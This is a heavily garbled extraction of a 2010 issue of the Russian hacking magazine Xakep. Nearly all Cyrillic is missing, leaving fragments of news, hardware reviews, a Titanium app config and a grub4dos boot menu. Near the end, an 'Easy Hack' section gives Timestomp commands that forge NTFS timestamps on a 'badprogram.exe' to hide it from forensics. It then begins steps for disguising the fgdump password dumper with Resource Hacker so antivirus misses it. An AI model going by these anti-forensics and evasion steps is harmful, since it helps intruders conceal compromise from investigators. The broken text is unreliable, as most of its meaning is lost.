
.

66

x 09 () 2010

.
210
:

CMS :

09 (140) 2010

/ STUXNET

JIT SPRAY


0DAY-

DEP ASLR
. 70

. 37



STUXNET
. 54

140


WI-FI
WINDOWS 7

TITANIUM

TDSS




. 82

INTRO
-2010. ,

.
,
,
,
!

Stuxnet, ?
.

DEP/ASLR?
!
CMS ?
0day!

nikitozz, . .


IBM - Lotus Symphony (. 37).
?

P.S. http://vkontakte.ru/club10933209
.

CONTENT
MegaNews

MALWARE

004

082

TDSS

086

HookFAQ: hard version

FERRUM
016
018
024

ASUS N53Jn

032
036
038

090

- NAS Synology DS210+

PC_ZONE
026

Titanium

game-developer'

Royal Flash,

042

Easy-Hack

048

054

Windows
Stuxnet

058

062

066

070

JIT SPRAY ! JIT SPRAY!

076

080

X-Tools

Windows 7

0day- CMS

Dlink 2500U

096

100

D-Bus

104

SMS- Android

108

112

Qt, Android

C++

SYN/ACK
116

120

125

130

Forefront UAG

OpenSolaris

134

PSYCHO: ,

140

FAQ UNITED

143

144

WWW2

FAQ

8.5

web-

032


game-developer'

054

Windows
Stuxnet

-Bus

096

066


D-Bus

0day- CMS

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

...



teh Internet.
60

,
, 1-
.
, (
, , ).
Wi-Fi , -,


- .
,
,
, . , -


. , , ,
, ,
. ,
, Wi-Fi-.

100- Blu-ray
BDXL. $60, 100
(3 ) 128 (4 ) .


, ,
90- , Mortal Kombat
? , , . -, , ,
, ,
, . ,
, Hyperkin RetroN 3,
Nintendo, Super Nintendo Sega Genesis.
. RetroN 3 ,
. ,
, ,
Sega. , , , 90- ,
RetroN 3 ( )
. 70 , ! :)

004

X 09 /140/ 10

MEGANEWS


!
Pirate Party , ,


,
. ,

, .

The Pirate Bay
?
, ,
TPB .
; !
PirateISP,
, ,

ViaEuropa.

,



.

$70, 70 ? ,

, .
Ch Russo
. ,
TPB ,
SQL-.

, 4 .
.


, . Google
, , .
.


,

, .


. ,
-

,
. ,

, , .
,

.

, Acer Asus,
: Quanta Computer, Compal
Electronics, Wistron ..


(IEEE).
; ,
,
. , ,

-.

WINDOWS !
2002 Microsoft -
( ,
, ) .
,
Windows XP, Windows 2000
Windows Server 2000. ,
Windows 7, Microsoft Windows Server 2008 R2, Microsoft Office
2010 Microsoft SQL Server.
: ,
Microsoft , -

006

, !
,
, . ,
- . ,
Microsoft.
Government Security Program (GSP),
.
Microsoft
. ? : 10% Microsoft .

MEGANEWS


Imperia, ,
Login Spoofer 2010, 200 000
. ,
... . ,
Login Spoofer 2010 , -,
.
- .
,
.., ,
.
.
-, , ,
, , . ,
,

, . :
, - ,
. !

Mozilla Google .
$3000 $3133.7

ZEUS
ZeuS/Zbot


.

,

,
, ZeuS
, ! Trend Micro
,

ZeuS
. , -
( ), , ,
. ZeuS, , 24, , 24.,
( ), ., Webmoney, RBK Money, e-port QIWI .
, ,
. , . ,
,
.

Amazon ,
. 100
180 .



15. , QR ,
, .
, . ,
: 27 ,
.
, .

008

, ,
,
. , , , ,
. ,
11 , ; , . , , , ,
, - ,
.

MEGANEWS


- Electronik Tribulation Army (ETA)
.
- -, ETA , , - . , (aka GhostExodus),
. ,
( RxBot). ,
, , , Windows, LogMeIn (www.logmein.com). ETA,
DDoS- . , YouTube,
IP ! ,
. 25-
.

, .
, .
,
, , , .
,
- DDoS,

. GhostExodus
, .
, , ,
. ETA
. ,
... , .
. , -

, DDoS,
.
, Fixer, dev//null Xon -
, .

.
: .
- .

BREIN
420 , 384 -.

-
,
. , Tamatebako
Fujitsu , , ,
. 2- AES-
256 .
, Tamatebako
.
, :
; ;
( 10
7 ). 707024 , 45 . ,
Tamatebako , ,
,
.


MEGANEWS

ASUS
, , Tefal ? Tefal , , , Asus.
,
. Asus
TurboV EPU (Energy Processing Unit),
. ,
,
. TurboV
,
37%! EPU, ,
, , ,
-, ,
.
,
BIOS , ,
. ,
Asus .
Asus
.

Avast : 100 , ,
XXX-. -
.

VS
Hack In
The Box .
HITB , The Underground Economy
( ). , ,
. ,

,
. , ,
, . , - , , , ,
. HITB , ,
,
. , ,
. ,
Mediaservice.net 18 ,
,
. HITB

. .




, ,
,
, ,
,
. ,
Asetek,
. Asetek
100%,

58 !

, , ,

. ,
, iMac 24-
, Intel
Core i7-920 (130 ) 2.66 -

NVIDIA GeForce GTX280M (75 ).



, , ,
,
. , , ,
Asetek .
, ,

.

Twitter
( ).
, - !


,
, .

- SGR-1,
Samsung.
: ,
5.5- 40-
, , , . ,

$200 000, ,
.

, , .
SGR-1,
160
,
(
), - , ,

. Skynet !

,
,
.

66% - The Times,

( )

,

, 100,
, . , ,

,
.
,
,
. Swiftpoint
, ,
, - . Swiftpoint
-,
-
.
,
.
- , ,

,
.
,
.
-, USB, , , 30
1 !
,
3-4 . , , ,
- 68
. 2 ,

, Swiftpoint
.

013

MEGANEWS


,
,
XX ,

. ,
, , - ,
Coulomb Technologies.

;
37 . , 15
.

,
Coulomb Technologies
.
,

12-16 ,
, 20 4 . ,
General Electric. GE
WattStation,

Fuseproject. General Electric
,
,


.
WattStation 4-8 .

P2P
, , , . Bitcoin,
peer-to-peer
.
21 .,
. 21 . ,
( 1 .). , , ,
. , -,
, ,
Bitcoin. ,
, . , P2P-
.
, .

, .
-

Bitcoin-.
. -, VoIP-,
VPN . , , ,
. Bitcoin-
www.bitcoin.org.

128

-, Toshiba

3D
Sony PlayStation 3,
. ,
3D ,
3D .
Sony ,
,
. , , - ,
, , . 3D
, , ,
A1B2C3, ,
ABC, 123.
.
. , , !


SKYPE !
,
Skype,
, , . ,
`,
, Skype,
.
, Skype , -
. - ,
,
.
Skype,
( ,
).
, . ,
( ),
: ,
RC4, Skype,

cryptolib.com. Skype - :
AES-256, RC4 ( TCP RC4,
UDP RC4 , DH-384 TCP RC4).
AES-256 RC4. , ,
,
AES 256- ,
1024-
RSA .

, , , ,
, . , ,
Skype- ,
- Skype. , , - , The 27th
Chaos Communication Congress, ,
.

73 . Blogetery.com -


FERRUM

ASUS N53Jn


Computex
Asus N,
.

Asus N53Jn, ,
.

ASUS N53Jn
.
,
.
,
.

016

Num
Pad ,
.
multi-touch,

,
.

,
.

,
,

: 15.6" HD (1366x768)
: Intel Core i5-540M 2.53
: Intel HM55
: 4 DDR3 1066
: Intel GMA HD + NVIDIA GeForce GT335M 1024Mb
: 640
: DVD+RW DL
: 1 USB 3.0, 3x USB 2.0, 1x e-SATA, HDMI, VGA, Audio/SPDIF, 7--1
: Wi-Fi 802.11b/g/n, Bluetooth 2.1+EDR, LAN
: 6 , 4400 , Li-ion
: Microsoft Windows 7 Ultimate x64
: 39.1 x 26.6 x 3.05~4.0 c
: 2,71


Asus Leather External HDD
500
USB 3.0. ,
, USB 3.0 10
2.0!

Asus BX700 Bluetooth-


1200 dpi.
.
:
.


NVIDIA
GeForce GT335M Intel GMA HD.
3D-,
.
USB 3.0, HDMI eSATA+USB 2.0

HD- .
, : web- On/off, ,
.
,
. Asus N53Jn
:).

ASUS STREAMLINE MESSENGER ,


, /
. . ,
.
16.

: ( ),
, , .
Express Gate,
IM-.

ASUS N53Jn , .
Intel Core i5-540M , NVIDIA
GeForce GT335M 3D-,
NVIDIA CUDA
GPU: , MD5 HD-. z

,
,
: 33 4 ! : Asus N53Jn SonicMaster
Asus Golden Ear Bang & Olufsen ICEpower. ,
,

.
ASUS N53Jn Mobile
Intel HM55 Express Chipset Intel Core
i5-540M 2,53 .
CPU Super PI 1M:
c Pi
. 15 , .

ASUS N
trendclub.ru. Trend
Club ,
. Trend Club
, ,
. Trend Club Intel ASUS
.
Intel,
, , ,
.
Intel Web-
Intel http://www.intel.ru, http://blogs.intel.com. Intel www.intel.ru/rating.

017

FERRUM




,
. ,
LAN, .

, ,
.
, , ,
, , ,
, , , , .

, ,
. ,
, .

018

, -.
.
,
, .
USB, , ,
.
-,
. ,
,
.

4500 .

11600 .

3Q 3QMMP
F330HW
:

: ETHERNET 10/100 /
: HDMI ( 1080I), , , RCA, 3X USB 2.0, 1X USB 2.0 SLAVE
: WI-FI 802.11 B/G
: MPEG-1, MPEG-2, MPEG-4, WMV9,
MPEG-2 HD TS, MPEG-4 ASP L5 ( GMC), DVD-VIDEO SUPERBIT DVD,
H.264, MKV, XVID, DIVX. :MPEG 1, 2, 4, AVI, WMV, MPG, ISO,
VOB, IFO, MP4, ASF, TP, TRP, TS, H.264 (MKV. MOV),
MP3, .AAC, .OGG, .WMA, .WAV, .AC3, ( DTS PASS
THROUGH), .FLAC, .PCM, .M4A
: 1080I
: HDD, USB HDD,

HDD :
, : 187X193X60

, , , . :

. , ( HDMI).
,
, ,
. ,
.

BBK
NP101S
:

: ETHERNET 10/100 /
: HDMI ( 1080P), , S-VIDEO, , S/PDIF, 2X USB 2.0
: N/A
: MPEG1/2/4 ELEMENTARY (M1V,
M2V, M4V), MPEG1/2 PS (M2P, MPG), MPEG2 TRANSPORT STREAM (TS,
TP, TRP, M2T, M2TS, MTS), VOB, AVI, ASF, WMV, MATROSKA (MKV), MOV
(H.264), MP4, RMP4, AAC, M4A, MPEG AUDIO (MP1, MP2, MP3, MPA), WAV,
WMA
: 1080P
HDD : 2
, : 270X132X32

, , ,
, .
,
FTP-, -,
, , , Google Maps.
.
: ( )
,
. :
.

019

FERRUM

2000 .

5900 .

ICONBIT
HDS6L
:

: ETHERNET 10/100 /
: HDMI1.3 ( - -),
(YPBPR), , SCART,
TOSLINK, SPDIF(5.1 DOLBY DIGITAL), (AUDIO
R/L), 2X USB 2.0, ESATA
: WI-FI 802.11N ( USB)
: H.264, VC-1, M-JPEG, WMV9, MPEG
1/2/4, HD DIVX , XVID, FLV, RM/RMVB, MKV, TS, M2TS, MTS, TP, TRP, WMV,
IFO, ISO, VOB, DAT, AVI, MPG, MP4, MOV, RM, RMVB, DIVX, XVID, FLV, MP3,
WMA, WAV, OGG, AAC, LPCM, FLAC, AC3, DTS, DTS HD, WAV [.WAV, .PCM],
ADIF, ADTS [.AAC], M4A [.M4A], OGG [.OGG], ASF/WMA [.ASF, .WMA], FLAC
[.FLAC]
: 1920X1080P
HDD :
, : 230X60X167

, ( , ) . ,
, YouTube, Picasa Flickr,
-, ,
. ,
SATA-, , USB. , ? ,
HDMI- ,
.

020

ONEXT MULTIMEDIA
BOX M-Box 1
:

: ETHERNET 10/100 /
: 2X USB, SD
: N/A
: REAL VIDEO 8/9/10 REALAUDIO
AAC AUDIO (*.RM, *.RMVB,) MPEG 1 MPEG 2 LAYER I, II, III, AC3*
AUDIO (*.MPG, *.MPEG, *.DAT) MPEG4 MP3 AUDIO (*.AVI), MP3, WMA
:
: USB, SD
HDD :
, : 1158822

,
, ,
,
. ,
: LAN,
, SD, SATA,
,
USB. ,

-, ,
. , ,
,
, ONEXT Multimedia BOX M-Box 1.

FERRUM

3800 .

3500 .

SEAGATE FREEAGENT
Theater

WESTERN DIGITAL
WD TV Live


, . , ,
, . ,
, ,
.
,
.
USB, a SATA ,
USB- , .
USB-.
, Seagate FreeAgent Theater Flickr, YouTube -.

,
HDD ,
,
LAN USB,
. Ethernet-
HD- ,
: .

-, YouTube,
:
, - .

: ETHERNET 10/100 /
: HDMI 1.3, , , 2X USB, LAN,
USB
: WI-FI
: MKV; AVI; DIVX; DIVX HD; RMVB REAL
MEDIA; WMV9; VC-1; MPEG-1; MPEG-2 (VOB/ISO); MPEG-4 (XVID); XVID
HD; MOV; AVC HD; H.264; M2TS; TS/TP/M2T; AAC; MP3; DOLBY DIGITAL;
DTS; FLAC; ASF; ADPCM; LPCM; OGG; WMA; WAV; JPEG FILES (UP TO 20
MEGAPIXELS); BMP; TIFF; PNG; GIF
: 1080I
: USB, LAN
HDD :
, : 31X183X180

,
.

022

: ETHERNET 10/100 /
: ETHERNET; HDMI; A/V; ; USB 2.0
:
USB
: AVI (XVID); AVC; MPEG1/2/4); MPG/
MPEG; VOB; MKV (H.264; X.264; AVC; MPEG1/2/4; VC-1); TS/TP/M2T
(MPEG1/2/4; AVC; VC-1); MP4/MOV (MPEG4; H.264); M2TS; WMV9; JPEG;
GIF; TIF/TIFF; BMP; PNG; MP3; WAV/PCM/LPCM; WMA; AAC; FLAC; MKA;
AIF/AIFF; OGG; DOLBY DIGITAL; DTS
: 1920X1080P24
: USB, LAN
HDD :
, : 40X100X126

ICONBIT
HDS6L -,
WD TV Live, /. z

, .
, - .
PocketBook 301.
Netronix Inc., .

.
PocketBook

E-Ink (6", Vizplex 600x800,
166 dpi)

,


.
,
.


PocketBook 301

.

,

,
.


512
,
SD
1 2 (
).

Samsung 400,
64
.




. PocketBook 301
FB2, TXT,
PDF, DJVU, RTF, HTML,
PRC, CHM, EPUB, DOC, TCR,
FB2.ZIP. ,

,
.


PocketBook 301
,


,


,



,
,

,
.

(1000 mAh)
8000
.


8 14 .

,


: E-ink
, !


:
, , ,
.
,

. PocketBook 301

. :
118x188x8,5 .

023

FERRUM

- NAS SYNOLOGY DS210+

, ,
.
, ,
, .


RAID-,
. , , HDD,
FreeBSD : CIFS, SMB ..
:). ,
,
.
:

024

, ,
, - ,
- .

:
NAS (Network Attached
Storage).
: , iPad,
, HD .
, ,


, Windows Media
Player,
.
.
NAS Synology: DS210+.

NAS

embedded-,
DS210+

. , : storage- 1,06 Freescale


512 DDR2,
Linux.

. ,

, ,
.
, ,
, .
, HDD NAS,
,
.
SATA- (
DS210+ ). ,

eSATA USB, . DS210+
eSATA 3 USB . ,
USB ,
IP-, . ,
NAS,
, ,

. .
,
,


DS210+
, .

,
, ,
, . .

NAS
,
.
DS210+, ,
31 /.
, . , ,
.
:
Wi-Fi ,
USB NAS. 802.11n ,

,
100 .
,
NAS
!
:
? .

, .
:
SMART ?
, , ,
,
NAS.
- ,
RAID 1
.
HDD , ,
e-mail, . SMS. ,

SMS- Clickatell (www.clickatell.com)
.
S.M.A.R.T bad-, NAS
,
.

Synology DiskStation Manager.

SYNOLOGY DSM

Synology DSM 2.3 .


,
. CD- NAS
Synology Assistant
,
IP-
Synology.
NAS ,
.
pat- ,
.
,

. ,
( Synology
Assistant) -

CD, www.synology.su
synology.com.
:
NAS
Synology -- Disk Station Manager (DSM).
, NAS -,

AJAX. Synology DSM
,
.

.
iSCSI
,


. Windows XP-Vista-7/Mac OS
X
iSCSI
, . ,
, ,
iSCSI kernel
2.6.12. ,
FTP, NFS,
SAMBA/CIFS AFP ( )
.

,

.

, ,
,

,
.
, DLNA/UPnP,
,
.
iTunes,
iTunes

music, video
photo.

DS210+ -
- (

),
.

,
. ,
. ,
- , , , torrent,
.
. z

025

PC_ZONE
aleks.raiden@gmail.com


Titanium
, .
,
iPhone/iPad, Android, ,
. Appcelerator
Titanium,
.

,
. Ubuntu Mandriva
Linux,
-, Windows ( ?),
. MacOS
. ?
, , , . Apple -
iPad/iPhone
iOS, Google Android OS,
Windows Mobile, Nokia, , BlackBerry
. . .
, , . !
, Java, , , , . Java- (
, , , Java),
. Android

026

Java, . , ,
, , API, iPad/
iPod/iPhone
.
, , -.
Appcelerator,

Titanium. , ,
( , ),
, .
, API, :
Windows, Linux, MacOS ! ?

Appcelerator Titanium -.
- ,
, ,

, API
,

, . .
-:
HTML 5, CSS JavaScript.
- . ,
Titanium
, ,
. , -,

: Python, Ruby PHP.
, : - , Windows, Linux
Android? -!
Titanium
.
: ,
, HTML- . - , API-, Titanium.
, : , ,
Blackberry
?. API ,


,
, .
Appcelerator ,
. Kroll C++,
,
,
.
, (JavaScript, C/C++, Python, Ruby, PHP),
Module API. ,
Binding
API, ,
.
() Kroll .
Java, C#/
Mono Lua. Github
www.github.com/appcelerator/kroll



. tiapp.xml
- , . runtime- ( ),
,
.
- Webkit,
HTML/CSS,
JavaScript-. . ,
, PHP Ruby, .
API ,
, ,
. ,
, , SDK
.
Titanium , , ,
. , ,
, .
, runtime- .
,
.
Appcelerator
,
.

,
. : ,
, -
.
, ,
. ,
Titanium
( bundled). , Network;

. - -

HTTP://WWW
links

:
www.appcelerator.com
API:
developer.appcelerator.com/documentation
:
www.appcelerator.com/showcase/applicationsshowcase
:
developer.appcelerator.com/training

: www.devx.com/wireless/Article/45208/1954?pf=true

027

PC_ZONE


.

,
, , .
,
, ,
.

API

, ,
API.
, .
,
, ,
.
Database SQLite, .
Network
. , ,
-: Comet,
WebSockets . , , : HTTP- , IRC-.
Worker , ,
, HTML5. -
, , ,
, ,
.
UI ,
. Titanium
, ,
- JavaScript,
HTML5.
.
. , , , VP8/WebM. ,
, Adobe AIR, .
Analytics
. - Google Analytics,
. , , ,
, ,
.
UpdateManager .
, , -

028


WebKit- Inspector
, API UpdateManager,
. :
,
.
, API
.
, .. , , - ,
, .
,
Facebook,
, (
). - :
,
( , , ). , ,
API Android iPad/iPhone,
,
.
, API , ,
PHP, Ruby
JavaScript,
(
). DOM-
. , , JavaScript, , ,
,
?

TITANIUM VS ADOBE AIR


, AIR Adobe, , , RIA-
. , , AIR,
Titanium .
,
, .
.
AIR- .

. , . , AIR
,
. , ,
AIR 64- Linux?


037

PC_ZONE

INFO

info

,

Android.

JDK
Android SDK.
Apple
MacOS,
, iPad


.

DVD
dvd


, SDK
,

,
,

.

Titanium:

,
Titanium.
www.appcelerator.com, .
Resources,
. ,
.
, (
),
tiapp.xml. ,
. , ,
, . ,
( ,
),
, .
HTML- .
, URL ?
. ,
, .
-
-, ,
WebKit, .

.
Titanium Developer, ,
tiapp.xml,
:
<?xml version='1.0' encoding='UTF-8'?>
<ti:app xmlns:ti='http://ti.appcelerator.org'>
  <id>ru.xaker.www</id>
  <name>Xaker WebApp</name>
  <version>1.0</version>
  <publisher>Vasja Pupkin</publisher>
  <url>http://xakep.ru</url>
  <icon>default_app_logo.png</icon>
  <window>
    <id>initial</id>
    <title>Xakep WebApp</title>
    <url>http://xakep.ru</url>
    <width>700</width>
    <max-width>3000</max-width>
    <min-width>0</min-width>
    <height>500</height>
    <max-height>3000</max-height>
    <min-height>0</min-height>
    <fullscreen>true</fullscreen>
    <resizable>true</resizable>
    <chrome scrollbars="true">true</chrome>
    <maximizable>true</maximizable>
    <minimizable>true</minimizable>
    <closeable>true</closeable>
  </window>
</ti:app>

,
<Esc>
, .

dist, .
, -,
read-only, -,
.

.

, Titanium !
API ,
? ! API ,
,

. ,
Android iPhone. ,
Mac Apple. Apple
AppStore , , Titanium

. z
X 08 /139/ 10

PC_ZONE
Johnny-K www.johnny-k.ru, Badim blog.elite-games.net


game-developer'

, , Flash-,
. ?
: .
Johnny-K, Flash' . 150 .

, ,
. :
Roly-Poly Cannon 3, Ragdoll Cannon 3 , .
: Cover Orange Roly-Poly
Eliminator iPad' ,
: , ? iPad', ,
. , :
. -
, - , ,
.

032

,
.
, .
- , , .
. , , .
. .
, , ,
. . . ,
, .

NailNoid

: .
, , , :).
.
- . , - . , ,
- (,
, ).
, -,
. , .
. ,
Activision Crytek,
. .
,
, , Activision?
, , .
( , , ), . ,
,
DVDBox' , ,
. ,
. 865$ , ,
3 ,
. , , , . .

, ,
. , , . .
, Flash . ,
.
. ,
.
, , .
, , , - , -- . . Flash, , ActionScript. Java C#,
. ,
, ,
, . - . , , . ,
, , , .
,
- . !
. , , , -
. : . . , .

- , ,
, . . , .
55- bmp-. -
. , ,
, ,
. , ,
. , ,
: -
. , :
!
- , , .
- , , , .
Nailnoid,
,
. , ? .
, if .
- ,
.
.
- FGL, .
: .
, ?. 300
. 4 300 .
,
300 . : 600 , 4 .
? .

,
, . , , !
,
, .
3- : , , .
, , .
, , .
, Flash' ? .
Box2D (www.box2d.org). , . Ragdoll Cannon,
Ragdoll Volleyball. Ragdoll Box2d.
Johnny-K $5000, Flash
. , Flash
.
, www.emanueleferonato.com, www.tonypa.pri.ee, www.kongregate.com/labs.
.
, : -

033

PC_ZONE

RagDoll Cannon

? ! ,
. Flash- - ,

. , ,
, ,
- (sprite-sheets). ,
, (Megaman, Zelda, Sonic).
, , ,
. ,
,
.
, , ,
. : .
: -
, ,
.
, , ,
. , .
, , , .
, . ,
, , .
- , . - , , , . ,
.
, , ,
.

, . ?
-. : ,
. -.
. ,
, ,
. ,
. ,
-.
, , ,
, .
,
. ,
,
.
, -
: www.newgrounds.com www.kongregate.com.
,

034

( ),
. , Ragdoll Cannon 2
. 1500 .
, .

,
? ? ,
:
! : () -
, -.
: ,
,
.
, , ,
,
, ,
. . . More
games. $100 $40000 , .
:
, ,
. ,
, .
: ,

-.
, :
. :
- , . ,

?
. :
- ( )
.
, .
, , , Mochi Ads (www.mochimedia.com)
CPMStar (www.cpmstar.com), .
, .
. , , $10000,
. 500-1000 .


Roly-Poly Cannon ,

INFO

info


flash- kongregate.com:

. ,
, 15 ,
. , 15
, ,
.
:
10 ,
10 .
?
Flash', ,
. , ,
FGL (www.flashgamelicense.com). ,
.
: .
, , , ,
. , .
2-
4- . ,
, , $5000? .
: 10%
. -
: ,
. , ,
, .
,
. ,

FGL
,

.
, - :
(
).


-, . , .
. , .
,
. -
. (
!). , , ,
.
P.S. iPhone/iPad,
. Ragdoll
Cannon.
. ,
, . - :
.
, ,
. Ragdoll
Blaster. ?

. :).z


,

(
,
).


,
,
.

HTTP://WWW
links
Flash:
flashgamedev.ru


:
blog.elite-games.net

035

PC_ZONE
STEP TWITTER.COM/STEPAH


, ,
.
.
IMEI .
,
- , , , ,
. .
, ,
, , MAC-
.
, ,
-,
. ,
, MAC-, MAC (
).
, MAC-
: . ,
, .
, .
Hamachi -

036

, IM-
VPN-. , ,
, IP-. ,
,

.
,
( IP-).
, .

Prey (www.preyproject.
com). ,
: Windows, Mac Linux,

Android. ?
! Prey
URL, ,
.
( !),

. ,
-
, Prey
. ,

, ,
.
: Prey
+ Control Panel Prey Standalone.

,

. Prey Standalone ,
,
email.
,
, . ,

,
.
- .
: , -,
.. Geo
,

GPS,
: Prey ESSID

. Wallpaper:
, .
,
.
TeamViewer (www.teamviewer.com/ru),

, IP-. z

:

>> coding

lotus.xakep.ru

X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 2011 !

DVD

- Lotus Symphony 3

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!

PC_ZONE
"Step" twitter.com/stepah

Royal Flash,



,
. , . , .
,
, LiveCD .

,
,
. ,
( , - ),
USB-. ,
,
:). , .
,
.
USB- , - (
). , , ,
. ,
.
(), ,
, , -

038

, , ,
USB-.
.
- ,
RAW , ,
.

. , .
,
: , ,
. , . , ,
, ,
. ,
- , .
, , R-Studio (www.r-studio.com/ru) PhotoRec
(www.cgsecurity.org/wiki/PhotoRec). ,

Alcor

VID PID Chip


Genius
, .
.

, ,
, , .
, ,
. ,
, : . ,
(
, ?),
. ,
. , ,
. VID ( ) PID ( ) , ,
.
: ChipGenius, CheckUDisk, USBDeview, UsbIDCheck,
, , . : ?
iFlash www.flashboot.ru, ,
, .
VID, PID . , VID = 8086, PID = 3A37. ,
ALCOR, ,
.
; , , flashboot.ru, ,
. , .
, , , . ,
, , , .
, , . .

LIVECD

. ? :)
(Dropbox ), - .

,
. - USB-
Backtrack ,
Linux.
, ,
, , LiveCD. , Linux (Fedora, Ubuntu ) , :
Dr.Web LiveCD (www.freedrweb.com/livecd), F-Secure Rescue CD
(www.f-secure.com), Kaspersky Rescue Disk
(support.kaspersky.ru/viruses/rescuedisk)
, ,
.
Ophcrack (ophcrack.sourceforge.net) NTPasswd
(home.eunet.no/pnordahl/ntpasswd) , .
Parted Magic (partedmagic.com) GParted (gparted.sourceforge.net)
, Partition Magic, .
Memtest86+ (www.memtest.org) MHDD (www.ihdd.ru/mhdd)

.
, , LiveCD,
, . ,
(!) , UNetbootin
(unetbootin.sourceforge.net),
ISO-. ,
LiveCD, , .
, ISO, . , ,
. . ,
.

, ,
. grub4dos (code.google.com/p/grub4dos-chenall) . ,
: grldr. ,
( ),
MBR .
grubinst (download.gna.org/grubutil). -

039

PC_ZONE

!
3. menu.lst , .

,
: Memtest86+
( , ) Offline NT Password & Registry Editor

INSIDE

Grub4Dos

, GUI- .
, ,
Disk. ,
, ,
. ,
: hd1, hd2
.. : ,
MBR
. , . , ,
Refresh .
, ,
. ,
Install , MBR. ;
. , ,
, .
grub4dos,
.
LiveCD- ISO-.
:
1. ISO .
2. menu.lst
grub4dos, .
.

040

,
. ,
.
NAND ,
. USB-, .

1 USB-, 2 , 3
( ) , 4
, 5 , 6. , 7
" ", 8
.


VID PID !
, .
USB .
VID PID
0000. ,
,
.
[a1]
.
(),
, . :
1. USB-
29 30 . , ,
, ,
, : 30-31, 31-32, 41-42, 42-43, 43-44.
,
. :
, , ( 37).
2. ,
USB-.
, . , .
, ,
, .

Windows .
, iso, ISO- memtest ntpasswd.

INFO

info


menu.lst
:
title Memtest
map (hd0,0)/iso/memtest/mt410.iso (hd32)
map --hook
root (hd32)
chainloader (hd32)
boot
title Offline NT Password & Registry Editor
map (hd0,0)/iso/ntpasswd/cd100627.iso (hd32)
map --hook
root (hd32)
chainloader (hd32)
boot


Title, ISO map.
, . . USB-,
grub4dos .
LiveCD-: Backtrack, Ophcrack,
Kaspersky Rescue Disk .
.
, , ISO-
.
GUI- WinContig (wincontig.mdtzone.it/en).
grub4dos
,
(greenflash.su/Grub4Dos/Grub4dos.htm). menu.lst,
.
MultiBootISOs (www.pendrivelinux.com/boot-multiple-iso-from-usb-multiboot-usb).
Syslinux
grub4dos,
ISO-,
. ,
ISO ,
MultiBootISOs .
LiveCD- Linux (Ubuntu, Fedora, OpenSUSE ..),

: GParted, Ophcrack ..
Windows 7. ,
8, 16 .. z

Microsoft

USB-
Windows 7 USB/DVD Download Tool
(store.microsoft.com/Help/ISO-Tool),
Windows.

DVD
dvd

,
LiveCD


.

WARNING

info

.

.

041


GreenDog agrrrdog@gmail.com

Easy Hack
1

:
NTFS ( ,
, , MFT)

:

, , , ,
. ,
( , )
/. . , James C. Foster Vincent Liu
BlackHat 2005 , Timestomp. -
.
. NTFS (),
(M), (A),
MFT (E). MFT (Master File Table). MFT
- ,
( ).
(MACE)
$FILE_NAME, $STANDARD_INFORMATION.
8 .
, Timestomp MACE $STANDARD_
INFORMATION . , ,
.
forensicswiki.org/wiki/Timestomp,
(metasploit.com/data/antiforensics/timestomp.exe) DVD.
:
Timestomp.exe _/

:
-m / -a / -c / -e / -z / /
/ MFT / ;
-f _ ;
, Timestomp

Timestomp Metasploit

-b ( 1/1/1601);
-r (
/);
-v .
:
_ // :: _
(AM/PM)
, .
, cmd.exe
badprogram.exe:
timestomp.exe badprogram.exe -f c:\WINDOWS\system32\cmd.exe

MFT badprogram.exe:
timestomp.exe badprogram.exe -e "Monday 11/13/2011 11:11:11 PM"

, .
Timestomp $STANDARD_INFORMATION,
, $FILE_NAME MFT.
, -,


, $STANDARD_INFORMATION,
-, , $FILE_NAME, $STANDARD_INFORMATION.
. Timestomp -b ( -r),
MACE. -
, ,
GMT . ,

GMT+3 . ,
.
. Timestomp ( ) Metasploit.
meterpreter use priv, ( ). , , meterpreter
.

:
.

:

,
. , -,
. ,
, ... ,
. :
.
, Webscarab
OWASP. Webscarab , .
-,
. OWASPa,
Java , .
owasp.org/index.php/Category:OWASP_WebScarab_Project.
Webscarab ,
( - )
( 127.0.0.1 8008 ).
.
:
HTTP/HTTPS- ( )
HTTP-
-
/ /
/ Bean
shell

XSS/CSRF-

... ..

: ,
GPU

:
, - ! ,
, , !
Starcraft! , ,
:). .
, ,
, , .
, , ,
,

HTTP- Webscarab
, !
:). Webscarab ,
( 2005, 2006 ).
. .
, ( :)).
Kuzya ! Webscarab . :
forum.antichat.ru/thread106452.html.
yehg.net/lab/pr0js/training/webscarab.php.
. , Webscarab , OWASP Webscarab_NG. ,
Webscarab, - ( , ).
, , , .
owasp.org/index.php/Category:OWASP_WebScarab_NG_Project.

GPU/CPU. golubev.com.
.
Ighashgpu MD4, MD5 SHA1 ( );
igrargpu RAR-, MS/OpenOffice/WinZip
.

, . ,
: / , , salt, ..

CPU GPU (golubev.com/about_cpu_and_gpu_ru.htm),
.

043

:
( )
, . .

.
, .
Resource Hacker. angusj.com/resourcehacker/. 2002 ,
:). , fgdump (foofus.net/~fizzgig/fgdump/downloads.htm). , (Tool For
Mass Password Auditing :)).
virustotal.com. ,
, (38/41).
.
, fgdump
, 30 41
(fgdump_2.exe). , ... Resource Hacker:
1. Resource Hacker(RH), , (c:\windows\system32\notepad.exe).
2. .
3. Version Info
fgdump.
4. RH c fgdump CompileScript.
